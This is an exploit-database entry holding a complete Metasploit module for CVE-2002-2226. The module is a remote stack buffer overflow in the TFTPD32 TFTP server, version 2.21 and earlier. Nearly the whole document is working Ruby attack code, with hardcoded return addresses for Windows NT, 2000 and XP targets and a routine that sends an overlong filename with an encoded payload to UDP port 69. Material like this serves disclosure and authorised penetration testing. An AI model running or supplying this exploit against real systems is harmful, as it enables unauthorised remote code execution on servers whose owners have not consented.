TFTPD32 < 2.21 - 'Filename' Remote Buffer Overflow (Metasploit)

Related Vulnerabilities: CVE-2002-2226  
Publish Date: 20 Sep 2010
Author: Metasploit
                							

                ##
# $Id: tftpd32_long_filename.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 &lt; Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Udp

	def initialize(info = {})
		super(update_info(info,
			'Name'           =&gt; 'TFTPD32 &lt;= 2.21 Long Filename Buffer Overflow',
			'Description'    =&gt; %q{
					This module exploits a stack buffer overflow in TFTPD32 version 2.21
				and prior. By sending a request for an overly long file name
				to the tftpd32 server, a remote attacker could overflow a buffer and
				execute arbitrary code on the system.
			},
			'Author'         =&gt; 'MC',
			'Version'        =&gt; '$Revision: 10394 $',
			'References'     =&gt;
				[
					['CVE', '2002-2226'],
					['OSVDB', '45903'],
					['BID', '6199'],
				],
			'DefaultOptions' =&gt;
				{
					'EXITFUNC' =&gt; 'process',
				},
			'Payload'        =&gt;
				{
					'Space'    =&gt; 250,
					'BadChars' =&gt; "\x00",
					'StackAdjustment' =&gt; -3500,
				},
			'Platform'       =&gt; 'win',
			'Targets'        =&gt;
				[
					['Windows NT 4.0 SP6a English',    { 'Ret' =&gt; 0x77f9d463} ],
					['Windows 2000 Pro SP4 English',   { 'Ret' =&gt; 0x7c2ec663} ],
					['Windows XP Pro SP0 English',     { 'Ret' =&gt; 0x77dc0df0} ],
					['Windows XP Pro SP1 English',     { 'Ret' =&gt; 0x77dc5527} ],
				],
			'Privileged'     =&gt; true,
			'DisclosureDate' =&gt; 'Nov 19 2002'
			))

		register_options(
			[
				Opt::RPORT(69)
			], self)
	end

	def exploit
		connect_udp

		print_status("Trying target #{target.name}...")

		sploit =
			"\x00\x01" +
			rand_text_english(120, payload_badchars) +
			"." +
			rand_text_english(135, payload_badchars) +
			[target.ret].pack('V') +
			payload.encoded +
			"\x00"

		udp_sock.put(sploit)

		disconnect_udp
	end

end